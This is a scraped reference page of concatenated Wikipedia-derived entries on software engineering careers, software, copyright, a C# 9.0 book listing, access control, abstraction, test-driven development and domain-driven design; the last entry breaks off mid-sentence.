Categories
DevOps Software Engineering

Software engineer

software engineer is a person who applies the principles of software engineering to the design, development, maintenance, testing, and evaluation of computer software.” (WP)

Occupation
Occupation typeProfession
Activity sectorsInformation technologySoftware industry
Description
CompetenciesRequirements analysis, specification development, algorithm design, software quality assurance, documentation tasks.
Education requiredVaries from bachelor’s degree to advanced degree in software engineering or related field

Education

Half of all practitioners today have degrees in computer scienceinformation systems, or information technology.[citation needed] A small, but growing, number of practitioners have software engineering degrees. In 1987, the Department of Computing at Imperial College London introduced the first three-year software engineering Bachelor’s degree in the UK and the world; in the following year, the University of Sheffield established a similar program.[1] In 1996, the Rochester Institute of Technology established the first software engineering bachelor’s degree program in the United States, however, it did not obtain ABET accreditation until 2003, the same time as Rice UniversityClarkson UniversityMilwaukee School of Engineering and Mississippi State University obtained theirs.[2] In 1997, PSG College of Technology in Coimbatore, India was the first to start a five-year integrated Master of Science degree in Software Engineering.[citation needed]

Since then, software engineering undergraduate degrees have been established at many universities. A standard international curriculum for undergraduate software engineering degrees, SE2004, was defined by a steering committee between 2001 and 2004 with funding from the Association for Computing Machinery and the IEEE Computer Society. As of 2004, in the U.S., about 50 universities offer software engineering degrees, which teach both computer science and engineering principles and practices. The first software engineering Master’s degree was established at Seattle University in 1979. Since then graduate software engineering degrees have been made available from many more universities. Likewise in Canada, the Canadian Engineering Accreditation Board (CEAB) of the Canadian Council of Professional Engineers has recognized several software engineering programs.

In 1998, the US Naval Postgraduate School (NPS) established the first doctorate program in Software Engineering in the world.[citation needed] Additionally, many online advanced degrees in Software Engineering have appeared such as the Master of Science in Software Engineering (MSE) degree offered through the Computer Science and Engineering Department at California State University, Fullerton. Steve McConnell opines that because most universities teach computer science rather than software engineering, there is a shortage of true software engineers.[3] ETS (École de technologie supérieure) University and UQAM (Université du Québec à Montréal) were mandated by IEEE to develop the Software Engineering Body of Knowledge (SWEBOK), which has become an ISO standard describing the body of knowledge covered by a software engineer.[4]

Other degrees

In business, some software engineering practitioners have CS or Software Engineering degrees. In embedded systems, some have electrical engineeringelectronics engineeringcomputer science with emphasis in “embedded systems” or computer engineering degrees, because embedded software often requires a detailed understanding of hardware. In medical software, practitioners may have medical informatics, general medical, or biology degrees.[citation needed]

Some practitioners have mathematicsscienceengineering, or technology (STEM) degrees. Some have philosophy (logic in particular) or other non-technical degrees.[citation needed] For instance, Barry Boehm earned degrees in mathematics. And, others have no degrees.[citation needed]

Profession

Employment

See also: Software engineering demographics

Most software engineers work as employees or contractors. Software engineers work with businesses, government agencies (civilian or military), and non-profit organizations. Some software engineers work on their own as consulting software engineers. Some organizations have specialists to perform all of the tasks in the software development process. Other organizations separate software engineers based on specific software-engineering tasks. These companies sometimes hire interns (possibly university or college students) over a short time. In large projects, software engineers are distinguished from people who specialize in only one role because they take part in the design as well as the programming of the project. In small projects, software engineers will usually fill several or all roles at the same time. Specializations include:

Impact of globalization

Most students in the developed world have avoided degrees related to software engineering because of the fear of offshore outsourcing (importing software products or services from other countries) and of being displaced by foreign visa workers.[5] Although government statistics do not currently show a threat to software engineering itself; a related career, computer programming does appear to have been affected.[6][7] Often one is expected to start out as a computer programmer before being promoted to software engineer. Thus, the career path to software engineering may be rough, especially during recessions.

Some career counselors suggest a student also focus on “people skills” and business skills rather than purely technical skills because such “soft skills” are allegedly more difficult to offshore. Reasonable command over reading, writing & speaking English is asked by most of employers.[8] It is the quasi-management aspects of software engineering that appear to be what has kept it from being impacted by globalization.[9]

Prizes

There are several prizes in the field of software engineering:[10]

  • The Codie awards is a yearly award issued by the Software and Information Industry Association for excellence in software development within the software industry.
  • Jolt Awards are awards in the software industry.
  • Stevens Award is a software engineering award given in memory of Wayne Stevens.

Use of the title “Engineer”

Main articles: Software engineering professionalism and Regulation and licensure in engineering

Origin of the term

Margaret Hamilton promoted the term “software engineering” during her work on the Apollo program. The term “engineering” was used to acknowledge that the work should be taken just as seriously as other contributions toward the advancement of technology. Hamilton details her use of the term:

When I first came up with the term, no one had heard of it before, at least in our world. It was an ongoing joke for a long time. They liked to kid me about my radical ideas. It was a memorable day when one of the most respected hardware gurus explained to everyone in a meeting that he agreed with me that the process of building software should also be considered an engineering discipline, just like with hardware. Not because of his acceptance of the new “term” per se, but because we had earned his and the acceptance of the others in the room as being in an engineering field in its own right.[11]

Suitability of the term

In each of the last few decades, at least one radical new approach has entered the mainstream of software development (e.g. Structured ProgrammingObject Orientation), implying that the field is still changing too rapidly to be considered an engineering discipline. Proponents argue that the supposedly radical new approaches are evolutionary rather than revolutionary.[citation needed]

Individual commentators have disagreed sharply on how to define software engineering or its legitimacy as an engineering discipline. David Parnas has said that software engineering is, in fact, a form of engineering.[12][13] Steve McConnell has said that it is not, but that it should be.[14] Donald Knuth has said that programming is an art and a science.[15] Edsger W. Dijkstra claimed that the terms software engineering and software engineer have been misused[improper synthesis?] and should be considered harmful, particularly in the United States.[16]

Regulatory classification

Canada

In Canada the use of the job title Engineer is controlled in each province by self-regulating professional engineering organizations who are also tasked with enforcement of the governing legislation. The intent is that any individual holding themselves out as an engineer has been verified to have been educated to a certain accredited level and their professional practice is subject to a code of ethics and peer scrutiny. It is also illegal to use the title Engineer in Canada unless an individual is licensed.

In Ontario, the Professional Engineers Act[17] stipulates a minimum education level of a three-year diploma in technology from a College of Applied Arts and Technology or a degree in a relevant science area.[18] However, engineering undergraduates and all other applicants are not allowed to use the title of engineer until they complete the minimum amount of work experience of four years in addition to completing the Professional Practice Examination (PPE). If the applicant does not hold an undergraduate engineering degree then they may have to take the Confirmatory Practice Exam or Specific Examination Program unless the exam requirements are waived by a committee.[19][20]

IT professionals with degrees in other fields (such as computer science or information systems) are restricted from using the title Software Engineer, or wording Software Engineer in a title, depending on their province or territory of residence.[citation needed]

In some instances, cases have been taken to court regarding the illegal use of the protected title Engineer.[21]

Europe

Throughout the whole of Europe, suitably qualified engineers may obtain the professional European Engineer qualification.

France

In France, the term ingénieur (engineer) is not a protected title and can be used by anyone, even by those who do not possess an academic degree.

However, the title Ingénieur Diplomé (Graduate Engineer) is an official academic title that is protected by the government and is associated with the Diplôme d’Ingénieur, which is one of the most prestigious academic degrees in France.

Iceland

The use of the title tölvunarfræðingur (computer scientist) is protected by law in Iceland.[22] Software engineering is taught in Computer Science departments in Icelandic universities. Icelandic law state that a permission must be obtained from the Minister of Industry when the degree was awarded abroad, prior to use of the title. The title is awarded to those who have obtained a BSc degree in Computer Science from a recognized higher educational institution.[23]

New Zealand

In New Zealand, the Institution of Professional Engineers New Zealand (IPENZ), which licenses and regulates the country’s chartered engineers (CPEng), recognizes software engineering as a legitimate branch of professional engineering and accepts application of software engineers to obtain chartered status provided they have a tertiary degree of approved subjects. Software Engineering is included whereas Computer Science is normally not.[24]

United States

The Bureau of Labor Statistics (BLS) classifies computer software engineers as a subcategory of “computer specialists”, along with occupations such as computer scientist, Programmer, Database administrator and Network administrator.[25] The BLS classifies all other engineering disciplines, including computer hardware engineers, as engineers.[26]

Many states prohibit unlicensed persons from calling themselves an Engineer, or from indicating branches or specialties not covered licensing acts.[27][28][29][30][31][32][33][34][35][36] In many states, the title Engineer is reserved for individuals with a Professional Engineering license indicating that they have shown minimum level of competency through accredited engineering education, qualified engineering experience, and engineering board’s examinations.[37][38][29][30][31][32][33][34][35][36]

In April 2013 the National Council of Examiners for Engineering and Surveying (NCEES) began offering a Professional Engineer (PE) exam for Software Engineering. The exam was developed in association with the IEEE Computer Society.[39] NCEES ended the exam in April 2019 due to lack of participation.[40]

See also

Wikimedia Commons has media related to Software engineers.

References

  1. ^ Cowling, A. J. 1999. The first decade of an undergraduate degree program in software engineering. Ann. Softw. Eng. 6, 1–4 (Apr. 1999), 61–90.
  2. ^ “ABET Accredited Engineering Programs”. April 3, 2007. Retrieved April 3,2007.
  3. ^ McConnell, Steve (July 10, 2003). Professional Software Development: Shorter Schedules, Higher Quality Products, More Successful Projects, Enhanced CareersISBN 978-0-321-19367-4.
  4. ^ Software Engineering — Guide to the software engineering body of knowledge (SWEBOK), International Organization for Standardization, 2015, retrieved January 11, 2020
  5. ^ “IT news, careers, business technology, reviews”Computerworld.
  6. ^ “Computer Programmers”.
  7. ^ “Software developer growth slows in North America | InfoWorld | News | 2007-03-13 | By Robert Mullins, IDG News Service”. Archived from the original on April 4, 2009.
  8. ^ “Hot Skills, Cold Skills”. Archived from the original on February 22, 2014.
  9. ^ Dual Roles: The Changing Face of IT
  10. ^ Some external links:
  11. ^ Lawrence, Snyder (2017). Fluency with information technology : skills, concepts, & capabilities ([Seventh edition] ed.). NY, NY. ISBN 978-0134448725OCLC 960641978.
  12. ^ Parnas, David L. (1998). “Software Engineering Programmes are not Computer Science Programmes”Annals of Software Engineering6: 19–37. doi:10.1023/A:1018949113292S2CID 35786237., p. 19: “Rather than treat software engineering as a subfield of computer science, I treat it as an element of the set, {Civil Engineering, Mechanical Engineering, Chemical Engineering, Electrical Engineering,….}.”
  13. ^ Parnas, David L. (1998). “Software Engineering Programmes are not Computer Science Programmes”Annals of Software Engineering6: 19–37. doi:10.1023/A:1018949113292S2CID 35786237., p. 20: “This paper argues that the introduction of accredited professional programs in software engineering, programmes that are modelled on programmes in traditional engineering disciplines will help to increase both the quality and quantity of graduates who are well prepared, by their education, to develop trustworthy software products.”
  14. ^ McConnell, Steve (August 2003). Professional Software Development: Shorter Schedules, Better Projects, Superior Products, Enhanced Careers. Boston, MA: Addison-Wesley. ISBN 0-321-19367-9., p. 39: “In my opinion, the answer to that question is clear: Professional software development should be engineering. Is it? No. But should it be? Unquestionably, yes. “
  15. ^ Knuth, Donald (1974). “Computer Programming as an Art” (PDF). Communications of the ACM17 (12): 667–673. doi:10.1145/361604.361612S2CID 207685720.Transcript of the 1974 Turing Award lecture.
  16. ^ Dijkstra, Edsger W; transcribed by Mario Béland (November 23, 2004) [First published December 3, 1993]. “There is still a war going on (manuscript Austin, 3 December 1993)”E. W. Dijkstra Archive. The University of Texas at Austin, Department of Computer Sciences. Retrieved February 17, 2007. When the term was coined in 1968 by F.L. Bauer of the Technological University of Munich, I welcomed it. [. . .] I interpreted the introduction of the term “software engineering” as an apt reflection of the fact that the design of software systems was an activity par excellence for the mathematical engineer. [. . .]. As soon the term arrived in the USA, it was relieved of all its technical content. It had to be so for in its original meaning it was totally unacceptable [. . .] In the meantime, software engineering has become an almost empty term, as was nicely demonstrated by Data General who overnight promoted all its programmers to the exalted rank of “software engineer”!
  17. ^ “Professional Engineers Act”. July 24, 2014.
  18. ^ “Academic Requirements”www.peo.on.ca.
  19. ^ “Confirmatory Exam Program”www.peo.on.ca.
  20. ^ “mybtechdegree.ca”mybtechdegree.ca.
  21. ^ ‘Professional Engineers of Ontario’ – “Quebec Engineers win court battle against Microsoft”
  22. ^ “Lög um löggildingu nokkurra starfsheita sérfræðinga í tækni- og hönnunargreinum” (in Icelandic). Parliament of Iceland – Althing. March 11, 1996. Retrieved August 25, 2014.
  23. ^ “Lög um breytingu á lögum nr. 8/1996, um löggildingu nokkurra starfsheita sérfræðinga í tækni- og hönnunargreinum, með síðari breytingum”Alþingi. Retrieved October 3, 2016.
  24. ^ “Good Practice Guidelines for Software Engineering in New Zealand” (PDF). IPENZ.
  25. ^ U.S Department of Labor and Statistics The 2000 Standard Occupational Classification (SOC) System: 15-0000 Computer and Mathematical Occupations
  26. ^ U.S Department of Labor and Statistics The 2000 Standard Occupational Classification (SOC) System: 17-0000 Architecture and Engineering Occupations
  27. ^ Florida Board of Professional Engineering. “The 2019 Florida Statutes”.
  28. ^ PROFESSIONAL ENGINEERS AND LAND SURVEYORS. “O.C.G.A. § 43-15-1” (PDF).
  29. a b NJ Engineering Board. “NEW JERSEY ADMINISTRATIVE CODE TITLE 13 LAW AND PUBLIC SAFETY CHAPTER 4 0” (PDF).
  30. a b SC Engineering Law. “Code of Laws – Title 40 – Chapter 22 – Engineers and Surveyors”.
  31. a b AL Engineering Law. “Alabama Law Regulating Practice of Engineering and Land Surveying” (PDF).
  32. a b VW Engineering Law. “West Virginia Engineering Law Statutes and Rules”(PDF).
  33. a b OK Engineering Law. “Oklahoma Statutes, Rules and Ethics for Professional Engineers” (PDF).
  34. a b NV Engineering Law. “NRS: Chapter 625 – Professional Engineers and Land Surveyors”Unlawful practice of engineering.
  35. a b MS Engineering Law. “Part 901: Rules and Regulations of the Mississippi Board of Licensure for Professional Engineers and Surveyors” (PDF).
  36. a b IL Engineering Law. “225 ILCS 325/ Professional Engineering Practice Act of 1989”.
  37. ^ Florida Board of Professional Engineering. “Chapter 471” (PDF).
  38. ^ GEORGIA BOARD OF PROFESSIONAL ENGINEERS AND LAND SURVEYORS. “O.C.G.A. § 43-15-1” (PDF).
  39. ^ “New Software Engineering Exam Approved for Licensure”. IEEE Computer Society. May 4, 2012. Retrieved August 6, 2018.
  40. ^ “NCEES discontinuing PE Software Engineering exam”. National Council of Examiners for Engineering and Surveying. March 13, 2018. Retrieved August 6,2018.

Categories

Sources:

Fair Use Sources:

Categories
Cloud Software Engineering

Software

Software is a collection of instructions and data that tell the computer how to work. This is in contrast to physical hardware, from which the system is built and actually performs the work. In computer science and software engineering, computer software is all information processed by computer systems, including programs and data. Computer software includes computer programslibraries and related non-executable data, such as online documentation or digital media. Computer hardware and software require each other and neither can be realistically used on its own.” (WP)

“At the lowest programming level, executable code consists of machine language instructions supported by an individual processor—typically a central processing unit (CPU) or a graphics processing unit (GPU). A machine language consists of groups of binary values signifying processor instructions that change the state of the computer from its preceding state. For example, an instruction may change the value stored in a particular storage location in the computer—an effect that is not directly observable to the user. An instruction may also invoke one of many input or output operations, for example displaying some text on a computer screen; causing state changes which should be visible to the user. The processor executes the instructions in the order they are provided, unless it is instructed to “jump” to a different instruction, or is interrupted by the operating system. As of 2015, most personal computerssmartphone devices and servers have processors with multiple execution units or multiple processors performing computation together, and computing has become a much more concurrent activity than in the past.” (WP)

“The majority of software is written in high-level programming languages. They are easier and more efficient for programmers because they are closer to natural languages than machine languages.[1] High-level languages are translated into machine language using a compiler or an interpreter or a combination of the two. Software may also be written in a low-level assembly language, which has strong correspondence to the computer’s machine language instructions and is translated into machine language using an assembler.” (WP)

Sources:

Fair Use Sources:

Categories
Cloud Software Engineering

Copyright

Copyright is a type of intellectual property that gives its owner the exclusive right to make copies of a creative work, usually for a limited time.[1][2][3][4][5] The creative work may be in a literary, artistic, educational, or musical form. Copyright is intended to protect the original expression of an idea in the form of a creative work, but not the idea itself.[6][7][8] A copyright is subject to limitations based on public interest considerations, such as the fair use doctrine in the United States.” (WP)

“Some jurisdictions require “fixing” copyrighted works in a tangible form. It is often shared among multiple authors, each of whom holds a set of rights to use or license the work, and who are commonly referred to as rights holders.[9][10][11][12][better source needed] These rights frequently include reproduction, control over derivative works, distribution, public performance, and moral rights such as attribution.[13]” (WP)

“Copyrights can be granted by public law and are in that case considered “territorial rights”. This means that copyrights granted by the law of a certain state, do not extend beyond the territory of that specific jurisdiction. Copyrights of this type vary by country; many countries, and sometimes a large group of countries, have made agreements with other countries on procedures applicable when works “cross” national borders or national rights are inconsistent.[14]” (WP)

“Typically, the public law duration of a copyright expires 50 to 100 years after the creator dies, depending on the jurisdiction. Some countries require certain copyright formalities[5] to establishing copyright, others recognize copyright in any completed work, without a formal registration. In general, many believe that the long copyright duration guarantees the better protection of works.” (WP)

Sources:

Fair Use Sources:

Categories
C# .NET Software Engineering

C# 9.0 Pocket Reference: Instant Help for C# 9.0 Programmers, 1st Edition

See also: C# and .NET Framework, C# Bibliography and C# 9.0 in a Nutshell

C# 9.0 Pocket Reference: Instant Help for C# 9.0 Programmers 1st Edition, by Joseph Albahari and Ben Albahari, 2021, B08SYWWDTX (CS9PR)

Fair Use Source: B08SYWWDTX (CS9PR)

When you have questions about C# 9.0 or .NET 5, this best-selling guide has the answers you need. C# is a language of unusual flexibility and breadth, but with its continual growth there’s so much more to learn. In the tradition of O’Reilly’s Nutshell guides, this thoroughly updated edition is simply the best one-volume reference to the C# language available today.

Organized around concepts and use cases, C# 9.0 in a Nutshell provides intermediate and advanced programmers with a concise map of C# and .NET that also plumbs significant depths.

  • Get up to speed on C#, from syntax and variables to advanced topics such as pointers, records, closures, and patterns
  • Dig deep into LINQ with three chapters dedicated to the topic
  • Explore concurrency and asynchrony, advanced threading, and parallel programming
  • Work with .NET features, including regular expressions, networking, spans, reflection, and cryptography

Joseph Albahari is author of C# 8.0 in a NutshellC# 8.0 Pocket Reference, and LINQ Pocket Reference (all from O’Reilly). He also wrote LINQPad, the popular code scratchpad and LINQ querying utility.

Book Details

  • ASIN: B08SYWWDTX
  • Publisher: O’Reilly Media; 1st edition (January 13, 2021)
  • Publication date: January 13, 2021
  • Print length: 362 pages

Table of Contents:

A First C# Program Compilation

Syntax Identifiers and Keywords

Literals, Punctuators, and Operators

Comments

Type Basics Predefined Type Examples

Custom Type Examples

Types and Conversions

Value Types Versus Reference Types

Predefined Type Taxonomy

Numeric Types Numeric Literals

Numeric Conversions

Arithmetic Operators

Increment and Decrement Operators

Specialized Integral Operations

8- and 16-Bit Integral Types

Special Float and Double Values

double Versus decimal

Real Number Rounding Errors

Boolean Type and Operators Equality and Comparison Operators

Conditional Operators

Strings and Characters String Type

Arrays Default Element Initialization

Indices and Ranges

Multidimensional Arrays

Simplified Array Initialization Expressions

Variables and Parameters The Stack and the Heap

Definite Assignment

Default Values

Parameters

var — Implicitly Typed Local Variables

Target-Typed new Expressions (C# 9)

Expressions and Operators Assignment Expressions

Operator Precedence and Associativity

Operator Table

Null Operators Null-Coalescing Operator

Null-Coalescing Assignment Operator

Null-Conditional Operator

Statements Declaration Statements

Expression Statements

Selection Statements

Iteration Statements

Jump Statements

Namespaces The using Directive

using static

Rules Within a Namespace

Aliasing Types and Namespaces

Classes Fields

Constants

Methods

Instance Constructors

Deconstructors

Object Initializers

The this Reference

Properties

Indexers

Static Constructors

Static Classes

Finalizers

Partial Types and Methods

The nameof Operator

Inheritance Polymorphism

Casting and Reference Conversions

Virtual Function Members

Abstract Classes and Abstract Members

Hiding Inherited Members

Sealing Functions and Classes

The base Keyword

Constructors and Inheritance

Overloading and Resolution

The object Type Boxing and Unboxing

Static and Runtime Type Checking

The GetType Method and typeof Operator

Object Member Listing

Equals, ReferenceEquals, and GetHashCode

The ToString Method

Structs Struct Construction Semantics

readonly Structs and Functions

Access Modifiers Friend Assemblies

Accessibility Capping

Interfaces Extending an Interface

Explicit Interface Implementation

Implementing Interface Members Virtually

Reimplementing an Interface in a Subclass

Default Interface Members

Enums Enum Conversions

Flags Enums

Enum Operators

Nested Types

Generics Generic Types

Generic Methods

Declaring Type Parameters

typeof and Unbound Generic Types

The default Generic Value

Generic Constraints

Subclassing Generic Types

Self-Referencing Generic Declarations

Static Data

Covariance

Contravariance

Delegates Writing Plug-In Methods with Delegates

Instance and Static Method Targets

Multicast Delegates

Generic Delegate Types

The Func and Action Delegates

Delegate Compatibility

Events Standard Event Pattern

Event Accessors

Lambda Expressions Capturing Outer Variables

Lambda Expressions Versus Local Methods

Anonymous Methods

try Statements and Exceptions The catch Clause

The finally Block

Throwing Exceptions

Key Properties of System.Exception

Enumeration and Iterators Enumeration

Collection Initializers

Iterators

Iterator Semantics

Composing Sequences

Nullable Value Types Nullable Struct

Nullable Conversions

Boxing/Unboxing Nullable Values

Operator Lifting

bool? with & and | Operators

Nullable Types and Null Operators

Nullable Reference Types

Extension Methods Extension Method Chaining

Ambiguity and Resolution

Anonymous Types

Tuples Naming Tuple Elements

Deconstructing Tuples

Records (C# 9) Defining a Record

Nondestructive Mutation

Primary Constructors

Records and Equality Comparison

Patterns var Pattern

Constant Pattern

Relational Patterns (C# 9)

Pattern Combinators (C# 9)

Tuple and Positional Patterns

Property Patterns

LINQ LINQ Fundamentals

Deferred Execution

Standard Query Operators

Chaining Query Operators

Query Expressions

The let Keyword

Query Continuations

Multiple Generators

Joining

Ordering

Grouping

OfType and Cast

Dynamic Binding Static Binding Versus Dynamic Binding

Custom Binding

Language Binding

RuntimeBinderException

Runtime Representation of dynamic

Dynamic Conversions

var Versus dynamic

Dynamic Expressions

Dynamic Member Overload Resolution

Uncallable Functions

Operator Overloading Operator Functions

Overloading Equality and Comparison Operators

Custom Implicit and Explicit Conversions

Attributes Attribute Classes

Named and Positional Attribute Parameters

Attribute Targets

Specifying Multiple Attributes

Writing Custom Attributes

Retrieving Attributes at Runtime

Caller Info Attributes

Asynchronous Functions The await and async Keywords

Capturing Local State

Writing Asynchronous Functions

Parallelism

Asynchronous Lambda Expressions

Asynchronous Streams

Unsafe Code and Pointers Pointer Basics

Unsafe Code

The fixed Statement

The Pointer-to-Member Operator

The stackalloc Keyword

Fixed-Size Buffers

void*

Function Pointers (C# 9)

Preprocessor Directives Pragma Warning

XML Documentation Standard XML Documentation Tags

Index

Sources:

Fair Use Source: B08SYWWDTX (CS9PR)

Categories
Cloud DevSecOps-Security-Privacy Operating Systems Software Engineering

Access Control

“access control – A *trusted process that limits access to the resources and objects of a computer system in accordance with a *security model. The process can be implemented by reference to a stored table that lists the *access rights of subjects to objects, e.g. users to records. Optionally the process may record in an *audit trail any illegal access attempts.” (ODCS)

Fair Use Source: B019GXM8X8 (ODCS)

Sources:

Fair Use Sources:

Categories
Cloud Software Engineering

Abstraction

“abstraction – The principle of ignoring those aspects of a subject that are not relevant to the current purpose in order to concentrate solely on those that are. The application of this principle is essential in the development and understanding of all forms of computer system. See data abstraction, procedural abstraction.” (ODCS)

Fair Use Source: B019GXM8X8 (ODCS)

Sources:

Fair Use Sources:

Categories
Cloud DevOps Software Engineering

TDD Test-Driven Development

Return to Timeline of the History of Computers, Networking

Test-driven development (TDD) is a software development process relying on software requirements being converted to test cases before software is fully developed, and tracking all software development by repeatedly testing the software against all test cases. This is opposed to software being developed first and test cases created later.

American software engineer Kent Beck, who is credited with having developed or “rediscovered”[1] the technique, stated in 2003 that TDD encourages simple designs and inspires confidence.[2]

Test-driven development is related to the test-first programming concepts of extreme programming, begun in 1999,[3] but more recently has created more general interest in its own right.[4]

Programmers also apply the concept to improving and debugging legacy code developed with older techniques.[5]

Test-driven development cycle

The following sequence is based on the book Test-Driven Development by Example:[2]

File:TDD Global Lifecycle.png
A graphical representation of the test-driven development lifecycle

1. Add a testIn test-driven development, each new feature begins with writing a test. Write a test that defines a function or improvements of a function, which should be very succinct. To write a test, the developer must clearly understand the feature’s specification and requirements. The developer can accomplish this through use cases and user stories to cover the requirements and exception conditions, and can write the test in whatever testing framework is appropriate to the software environment. It could be a modified version of an existing test. This is a differentiating feature of test-driven development versus writing unit tests after the code is written: it makes the developer focus on the requirements before writing the code, a subtle but important difference.2. Run all tests and see if the new test failsThis validates that the test harness is working correctly, shows that the new test does not pass without requiring new code because the required behavior already exists, and it rules out the possibility that the new test is flawed and will always pass. The new test should fail for the expected reason. This step increases the developer’s confidence in the new test.3. Write the codeThe next step is to write some code that causes the test to pass. The new code written at this stage is not perfect and may, for example, pass the test in an inelegant way. That is acceptable because it will be improved and honed in Step 5.At this point, the only purpose of the written code is to pass the test. The programmer must not write code that is beyond the functionality that the test checks.4. Run testsIf all test cases now pass, the programmer can be confident that the new code meets the test requirements, and does not break or degrade any existing features. If they do not, the new code must be adjusted until they do.5. Refactor codeThe growing code base must be cleaned up regularly during test-driven development. New code can be moved from where it was convenient for passing a test to where it more logically belongs. Duplication must be removed. Objectclassmodulevariable and method names should clearly represent their current purpose and use, as extra functionality is added. As features are added, method bodies can get longer and other objects larger. They benefit from being split and their parts carefully named to improve readability and maintainability, which will be increasingly valuable later in the software lifecycleInheritance hierarchies may be rearranged to be more logical and helpful, and perhaps to benefit from recognized design patterns. There are specific and general guidelines for refactoring and for creating clean code.[6][7] By continually re-running the test cases throughout each refactoring phase, the developer can be confident that process is not altering any existing functionality.The concept of removing duplication is an important aspect of any software design. In this case, however, it also applies to the removal of any duplication between the test code and the production code—for example magic numbers or strings repeated in both to make the test pass in Step 3.RepeatStarting with another new test, the cycle is then repeated to push forward the functionality. The size of the steps should always be small, with as few as 1 to 10 edits between each test run. If new code does not rapidly satisfy a new test, or other tests fail unexpectedly, the programmer should undo or revert in preference to excessive debuggingContinuous integration helps by providing revertible checkpoints. When using external libraries it is important not to make increments that are so small as to be effectively merely testing the library itself,[4] unless there is some reason to be

Fair Use Sources:

Categories
Cloud DevOps Software Engineering

DDD Domain-Driven Design

Return to Timeline of the History of Computers, Networking

Domain-driven design (DDD) is the concept that the structure and language of software code (class names, class methods, class variables) should match the business domain. For example, if a software processes loan applications, it might have classes such as LoanApplication and Customer, and methods such as AcceptOffer and Withdraw.

DDD connects the implementation to an evolving model.[1]

Domain-driven design is predicated on the following goals:

  • placing the project’s primary focus on the core domain and domain logic;
  • basing complex designs on a model of the domain;
  • initiating a creative collaboration between technical and domain experts to iteratively refine a conceptual model that addresses particular domain problems.

The term was coined by Eric Evans in his book of the same title.[2]

Concepts

Concepts of the model include:ContextThe setting in which a word or statement appears that determines its meaning;DomainA sphere of knowledge (ontology), influence, or activity. The subject area to which the user applies a program is the domain of the software;ModelA system of abstractions that describes selected aspects of a domain and can be used to solve problems related to that domain;Ubiquitous LanguageA language structured around the domain model and used by all team members to connect all the activities of the team with the software.

Strategic domain-driven design

Semantic network of patterns in strategic domain-driven design.

Ideally, it would be preferable to have a single, unified model. While this is a noble goal, in reality it typically fragments into multiple models. It is useful to recognize this fact of life and work with it.

Strategic Design is a set of principles for maintaining model integrity, distilling the Domain Model, and working with multiple models.[citation needed]

Bounded context

Multiple models are in play on any large project. Yet when code based on distinct models is combined, software becomes buggy, unreliable, and difficult to understand. Communication among team members becomes confusing. It is often unclear in what context a model should not be applied.

Therefore: Explicitly define the context within which a model applies. Explicitly set boundaries in terms of team organization, usage within specific parts of the application, and physical manifestations such as code bases and database schemas. Keep the model strictly consistent within these bounds, but don’t be distracted or confused by issues outside and inside.

Continuous integration

When a number of people are working in the same bounded context, there is a strong tendency for the model to fragment. The bigger the team, the bigger the problem, but as few as three or four people can encounter serious problems. Yet breaking down the system into ever-smaller contexts eventually loses a valuable level of integration and coherency.

Therefore: Institute a process of merging all code and other implementation artifacts frequently, with automated tests to flag fragmentation quickly. Relentlessly exercise the ubiquitous language to hammer out a shared view of the model as the concepts evolve in different people’s heads.

Context map

An individual bounded context leaves some problems in the absence of a global view. The context of other models may still be vague and in flux.

People on other teams won’t be very aware of the context bounds and will unknowingly make changes that blur the edges or complicate the interconnections. When connections must be made between different contexts, they tend to bleed into each other.

Therefore: Identify each model in play on the project and define its bounded context. This includes the implicit models of non-object-oriented subsystems. Name each bounded context, and make the names part of the ubiquitous language. Describe the points of contact between the models, outlining explicit translation for any communication and highlighting any sharing. Map the existing terrain.

Building blocks

In the book Domain-Driven Design,[2] a number of high-level concepts and practices are articulated, such as ubiquitous language meaning that the domain model should form a common language given by domain experts for describing system requirements, that works equally well for the business users or sponsors and for the software developers. The book is very focused on describing the domain layer as one of the common layers in an object-oriented system with a multilayered architecture. In DDD, there are artifacts to express, create, and retrieve domain models:EntityAn object that is not defined by its attributes, but rather by a thread of continuity and its identity.Example: Most airlines distinguish each seat uniquely on every flight. Each seat is an entity in this context. However, Southwest Airlines, EasyJet and Ryanair do not distinguish between every seat; all seats are the same. In this context, a seat is actually a value object.Value objectAn object that contains attributes but has no conceptual identity. They should be treated as immutable.Example: When people exchange business cards, they generally do not distinguish between each unique card; they are only concerned about the information printed on the card. In this context, business cards are value objects.AggregateA collection of objects that are bound together by a root entity, otherwise known as an aggregate root. The aggregate root guarantees the consistency of changes being made within the aggregate by forbidding external objects from holding references to its members.Example: When you drive a car, you do not have to worry about moving the wheels forward, making the engine combust with spark and fuel, etc.; you are simply driving the car. In this context, the car is an aggregate of several other objects and serves as the aggregate root to all of the other systems.Domain EventA domain object that defines an event (something that happens). A domain event is an event that domain experts care about.ServiceWhen an operation does not conceptually belong to any object. Following the natural contours of the problem, you can implement these operations in services. See also Service (systems architecture).RepositoryMethods for retrieving domain objects should delegate to a specialized Repository object such that alternative storage implementations may be easily interchanged.FactoryMethods for creating domain objects should delegate to a specialized Factory object such that alternative implementations may be easily interchanged.

Disadvantages

In order to help maintain the model as a pure and helpful language construct, the team must typically implement a great deal of isolation and encapsulation within the domain model. Consequently, a system based on domain-driven design can come at a relatively high cost. While domain-driven design provides many technical benefits, such as maintainability, Microsoft recommends that it be applied only to complex domains where the model and the linguistic processes provide clear benefits in the communication of complex information, and in the formulation of a common understanding of the domain.[3]

Relationship to other ideas

Object-oriented analysis and designAlthough, in theory, the general idea of DDD need not be restricted to object-oriented approaches, in practice DDD seeks to exploit the advantages that object-oriented techniques make possible. These include entities/aggregate roots as receivers of commands/method invocations and the encapsulation of state within foremost aggregate roots and on a higher architectural level, bounded contexts.Model-driven engineering (MDE) and Model-driven architecture (MDA)While DDD is compatible with MDA/MDE (where MDE can be regarded as a superset of MDA) the intent of the two concepts is somewhat different. MDA is concerned more with the means of translating a model into code for different technology platforms than with the practice of defining better domain models. The techniques provided by MDE (to model domains, to create DSLs to facilitate the communication between domain experts and developers,…) facilitate the application of DDD in practice and help DDD practitioners to get more out of their models. Thanks to the model transformation and code generation techniques of MDE, the domain model can be used not only to represent the domain but also to generate the actual software system that will be used to manage it. This picture shows a possible representation of DDD and MDE combined.Plain Old Java Objects (POJOs) and Plain Old CLR Objects (POCOs)POJOs and POCOs are technical implementation concepts, specific to Java and the .NET Framework respectively. However, the emergence of the terms POJO and POCO reflect a growing view that, within the context of either of those technical platforms, domain objects should be defined purely to implement the business behaviour of the corresponding domain concept, rather than be defined by the requirements of a more specific technology framework.The naked objects patternBased on the premise that if you have a good enough domain model, the user interface can simply be a reflection of this domain model; and that if you require the user interface to be a direct reflection of the domain model then this will force the design of a better domain model.[4]Domain-specific modeling (DSM)DSM is DDD applied through the use 